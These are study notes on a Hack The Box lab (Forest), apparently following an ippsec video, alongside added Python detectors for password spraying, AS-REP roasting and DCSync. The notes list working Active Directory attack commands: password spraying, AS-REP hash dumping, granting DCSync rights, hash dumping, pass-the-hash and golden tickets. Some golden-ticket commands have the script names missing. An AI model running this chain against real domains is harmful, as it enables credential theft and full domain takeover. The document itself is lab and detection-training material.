Forest HTB (ippsec) - follow-through

  • try to enumerate SMB

  • try to find host names with nslookup


    • the actual IP

  • ldapsearch -x -h IP -s base namingcontexts (find the domain naming contexts)

  • ldapsearch -x -h IP -b "DC=htb,DC=local" '(objectClass=Person)' ATTRIBUTES (the attributes you want to see)

    • for the attribute part you can put whatever you want, like sAMAccountName

    • we can use objectClass=user instead of Person, too

We can password-spray once we have the account names.

Pipe the output through awk '{print $2}' to print the second field (the account name).

Make a user list with the valid users (no need to include the Guest account or the names ending with $; valid user names are generally short).

Let's try passwords against them!

The password list should be short:

months, Spring, Summer, Winter, Autumn, Fall, Password, Password123, P@ssw0rd, Secret

for i in $(cat pwlist.txt); do echo $i; echo ${i}2019; echo ${i}2020; done

  • this appends a year to each word.

hashcat --force --stdout pwlist.txt -r /usr/share/hashcat/rules/best64.rules

This mutates the passwords and writes a new password list.

  • add a ! at the end of each word:

  • for i in $(cat pwlist.txt); do echo $i; echo ${i}\!; done

Another technique

  • hashcat --force --stdout pwlist.txt -r /usr/share/hashcat/rules/best64.rules -r /usr/share/hashcat/rules/toggles1.rule | sort -u

    • toggles1.rule capitalizes different letters; pipe to awk 'length($0) > 8' to keep only passwords longer than 8 characters

Dump password policy

  • crackmapexec smb IP --pass-pol

  • crackmapexec smb IP --pass-pol -u '' -p '' (null authentication attempt)

  • enum4linux

Manual way to look up password policy

If the output looks like the one below, it's using RPC.

Run rpcclient -U '' IP

and once logged in:

  • enumdomains

  • enumdomusers

  • queryusergroups 0x47b (rid)

  • querygroup GROUPRID to see which group that RID is

  • queryuser rid to see password policies

Crack passwords

crackmapexec smb IP -u userlist.out -p pwlist.out
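The spray above works because each account sees only one or two attempts, so it never trips the lockout threshold dumped earlier. This added example (not part of the original notes or of ippsec's video) shows the detection logic a defender would run over the domain controller's Security log instead: group failed logons (4625, 4771) by source address and alert when one source hits many distinct accounts inside a window. The event fields and IP addresses are constructed sample data.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Security log events: 4625 = failed logon, 4771 = Kerberos pre-auth failed.
# Field names are simplified from the real event XML.
EVENTS = [
    {"id": 4625, "time": "2024-03-01T10:00:00", "src": "10.10.14.5", "user": "alice"},
    {"id": 4625, "time": "2024-03-01T10:00:02", "src": "10.10.14.5", "user": "bob"},
    {"id": 4625, "time": "2024-03-01T10:00:04", "src": "10.10.14.5", "user": "carol"},
    {"id": 4625, "time": "2024-03-01T10:00:06", "src": "10.10.14.5", "user": "dave"},
    {"id": 4625, "time": "2024-03-01T10:00:08", "src": "10.10.14.5", "user": "erin"},
    {"id": 4771, "time": "2024-03-01T10:00:10", "src": "10.10.14.5", "user": "svc-alfresco"},
    # One user mistyping their own password three times is not a spray.
    {"id": 4625, "time": "2024-03-01T10:05:00", "src": "10.10.10.20", "user": "carol"},
    {"id": 4625, "time": "2024-03-01T10:05:03", "src": "10.10.10.20", "user": "carol"},
    {"id": 4625, "time": "2024-03-01T10:05:07", "src": "10.10.10.20", "user": "carol"},
]

def detect_spray(events, window=timedelta(minutes=10), min_users=5, lockout_threshold=5):
    """For every source whose failures hit at least `min_users` distinct accounts inside
    `window`, return (distinct users, most attempts against any one user, under_lockout).
    under_lockout is True when every account saw fewer attempts than the lockout threshold,
    i.e. the pattern a lockout policy alone never catches."""
    by_src = defaultdict(list)
    for e in sorted(events, key=lambda e: e["time"]):
        if e["id"] in (4625, 4771):
            by_src[e["src"]].append(e)
    alerts = {}
    for src, evs in by_src.items():
        times = [datetime.fromisoformat(e["time"]) for e in evs]
        start = 0
        for end in range(len(evs)):
            while times[end] - times[start] > window:   # slide the window forward
                start += 1
            per_user = defaultdict(int)
            for e in evs[start:end + 1]:
                per_user[e["user"]] += 1
            if len(per_user) >= min_users:
                worst = max(per_user.values())
                alerts[src] = (len(per_user), worst, worst < lockout_threshold)
    return alerts
```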


Impacket: GetNPUsers.py htb.local/ -dc-ip IP -request -format hashcat

This looks for accounts that don't require Kerberos pre-authentication and dumps their hashes.

Then crack the output.
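What GetNPUsers relies on is a single userAccountControl bit on the account. This added example (not from the original notes or from Impacket) audits a constructed LDAP dump for that bit and flags the matching 4768 TGT requests in the Security log, which is the defender's view of the same step. The account names, control values and event fields are constructed sample data.

```python
# userAccountControl bits (well-known AD values); DONT_REQ_PREAUTH is what GetNPUsers looks for
UAC_FLAGS = {
    0x2: "ACCOUNTDISABLE",
    0x200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
}
RC4_HMAC = 0x17  # ticket encryption type in event 4768; the RC4 AS-REP is the crackable one

def decode_uac(value):
    """Expand a userAccountControl integer into the names of the bits that are set."""
    return sorted(name for bit, name in UAC_FLAGS.items() if value & bit)

def roastable(accounts):
    """Enabled accounts whose userAccountControl has DONT_REQ_PREAUTH set."""
    return sorted(n for n, uac in accounts.items()
                  if uac & 0x400000 and not uac & 0x2)

def asrep_hits(events, accounts):
    """4768 TGT requests made without pre-authentication for a roastable account, or that
    were answered with RC4. Returns (user, source, enc_type) tuples."""
    targets = set(roastable(accounts))
    return [(e["user"], e["src"], hex(e["enc_type"])) for e in events
            if e["id"] == 4768 and e["pre_auth_type"] == 0
            and (e["user"] in targets or e["enc_type"] == RC4_HMAC)]

# Constructed sample data: sAMAccountName -> userAccountControl, and 4768 events.
ACCOUNTS = {
    "svc-alfresco": 0x200 | 0x10000 | 0x400000,   # enabled, pre-auth not required
    "alice": 0x200,                                # enabled, normal
    "old-svc": 0x200 | 0x400000 | 0x2,             # bit set but account disabled
}
EVENTS = [
    {"id": 4768, "user": "svc-alfresco", "src": "10.10.14.5", "pre_auth_type": 0, "enc_type": 0x17},
    {"id": 4768, "user": "alice", "src": "10.10.10.20", "pre_auth_type": 2, "enc_type": 0x12},
]
```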


crackmapexec smb IP -u svc-alfresco -p s3rvice --shares

shows the shares


Use evil-winrm

./evil-winrm.rb -u user -p pass -i IP

---> this should give you a shell as the service account


Priv Esc


On Kali:

  • download the BloodHound zip file and the application file separately.

  • After downloading, unzip the application file.

  • Download neo4j

Run neo4j console, then set a new password (the default is neo4j) by visiting localhost:PORT in a browser.

  • Now start BloodHound with ./Bloodhound --no-sandbox and log in

On the victim's machine, upload SharpHound.exe (or run it from the mounted drive):

./SharpHound.exe -c all

On Kali,

  • drag the zip file SharpHound produced onto the BloodHound window, which should start the import

In the search bar, type the user you already control and mark it as owned

-> show paths from owned principals -> shows a graph

If you see the Account Operators group, its members can create users

On the victim's machine:

net user gori gorigori /add /domain (user gori, password gorigori)

this should create an account.

net group "Exchange Windows Permissions" /add gori

net group "Exchange Windows Permissions" (without /add) verifies that the user has been added.

In BloodHound, click the WriteDacl edge > Abuse Info

Add-DomainObjectAcl -Credential $cred -TargetIdentity testlab.local -Rights DCSync

This is a PowerView command.

Download the dev version of PowerSploit with -b dev on git clone

copy the powerview.ps1 over to the victim's machine.

$pass = ConvertTo-SecureString 'gorigori' -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential('htb\gori', $pass)

Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity gori -Rights DCSync

Then on Kali,

use impacket's htb/gori:gorigori@IP

grab the last :HASH: part (the NT hash) for the Administrator account

Pass the hash
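The two steps just taken, rewriting the ACL of the domain object and then asking the DC to replicate, each leave a specific Security log event (5136 with nTSecurityDescriptor, 4662 with the replication extended rights). This added example (not from the original notes, PowerView or Impacket) shows how a defender ties them together; the events, the DC allow-list and the "gori" subject are constructed sample data.

```python
# Extended-right GUIDs that event 4662 lists in Properties when replication is requested.
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100  # Access Mask bit for an extended right in 4662

# Constructed sample events (field names simplified from the real event XML).
EVENTS = [
    # 5136: a plain user rewrote the security descriptor of the domain head (the WriteDacl step)
    {"id": 5136, "time": "2024-03-01T11:00:00", "subject": "HTB\\gori",
     "object": "DC=htb,DC=local", "attribute": "nTSecurityDescriptor"},
    # 4662: the same user then requested replication, which is what a DCSync dump triggers
    {"id": 4662, "time": "2024-03-01T11:00:30", "subject": "HTB\\gori",
     "object": "DC=htb,DC=local", "access_mask": 0x100,
     "properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
                    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},
    # 4662: a domain controller's machine account replicating is business as usual
    {"id": 4662, "time": "2024-03-01T11:01:00", "subject": "HTB\\DC01$",
     "object": "DC=htb,DC=local", "access_mask": 0x100,
     "properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"]},
]
DC_ACCOUNTS = {"HTB\\DC01$"}  # constructed allow-list of domain controller accounts

def dcsync_alerts(events, dc_accounts):
    """Return (subject, rights, acl_changed_first) for every replication request that was
    not made by a DC account. acl_changed_first is True when the same subject modified the
    domain object's nTSecurityDescriptor earlier, i.e. the WriteDacl -> DCSync chain."""
    acl_changers = set()
    alerts = []
    for e in sorted(events, key=lambda e: e["time"]):
        if e["id"] == 5136 and e["attribute"] == "nTSecurityDescriptor":
            acl_changers.add(e["subject"])
        elif e["id"] == 4662 and e["access_mask"] & CONTROL_ACCESS:
            rights = sorted(REPL_RIGHTS[g] for g in e["properties"] if g in REPL_RIGHTS)
            if rights and e["subject"] not in dc_accounts:
                alerts.append((e["subject"], rights, e["subject"] in acl_changers))
    return alerts
```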

crackmapexec smb IP -u administrator -H HASH htb.local/Administrator:Pass@

This should get you a root shell.


Another way to crack

NTLM password cracking:

cat hash.out | grep ::: | awk -F: '{print $1":"$4}'

and do

hashcat --user -m 1000 new_hashes.out rockyou.txt -r rules/InsidePro-PasswordsPro.rule

  • --user tells hashcat the input format is "user:hash"

  • --show prints the cracked entries afterwards


Golden Ticket method

Copy the krbtgt hash from the same dump.

On the victim's machine, run the following to get the domain SID (the -domain-sid value):

Get-ADDomain htb.local

Golden ticket
With Impacket examples:

# To generate the TGT with NTLM
python -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name>  <user_name>
# To generate the TGT with AES key
python -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name>  <user_name>

# Set the ticket for impacket use
export KRB5CCNAME=<TGS_ccache_file>

# Execute remote commands with any of the following by using the TGT
python <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python <domain_name>/<user_name>@<remote_hostname> -k -no-pass

# the username can be anything.

  • an IP address should not be used for remote_hostname; always add the host name to the hosts file.

If it complains that the time is wrong, we have to change our clock (nmap shows the clock skew):

date -s TIME

to change the time.
